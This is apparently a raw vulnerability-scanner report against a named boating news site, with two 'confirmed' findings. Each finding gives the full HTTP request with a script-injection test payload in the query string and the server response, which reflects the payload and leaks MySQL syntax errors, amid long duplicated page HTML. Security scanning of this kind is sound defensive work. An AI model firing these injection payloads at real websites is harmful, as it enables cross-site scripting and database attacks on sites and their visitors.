<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/sub..
- /news/todays-top-stories/275652-report-2010-worst-year-yet-for-piracy

/news/todays-top-stories/275652-report-2010-worst-year-yet-for-piracy CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275652-report-2010-worst-year-yet-for-piracy?..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D0)</script>

Request

GET /news/todays-top-stories/275652-report-2010-worst-year-yet-for-piracy?'"--></style></script><script>netsparker(0x0025D0)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D0)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D0)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275652-report-2010-worst-year-yet-for-piracy" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Report: 2010 worst year yet for piracy" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Report: 2010 worst year yet for piracy</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter..
- /news/todays-top-stories/275622-accomplished-painters-join-lecture-serie

/news/todays-top-stories/275622-accomplished-painters-join-lecture-serie CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275622-accomplished-painters-join-lecture-ser..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D2)</script>

Request

GET /news/todays-top-stories/275622-accomplished-painters-join-lecture-serie?'"--></style></script><script>netsparker(0x0025D2)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D2)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D2)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275622-accomplished-painters-join-lecture-serie" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Accomplished painters join lecture series" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Accomplished painters join lecture series</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a 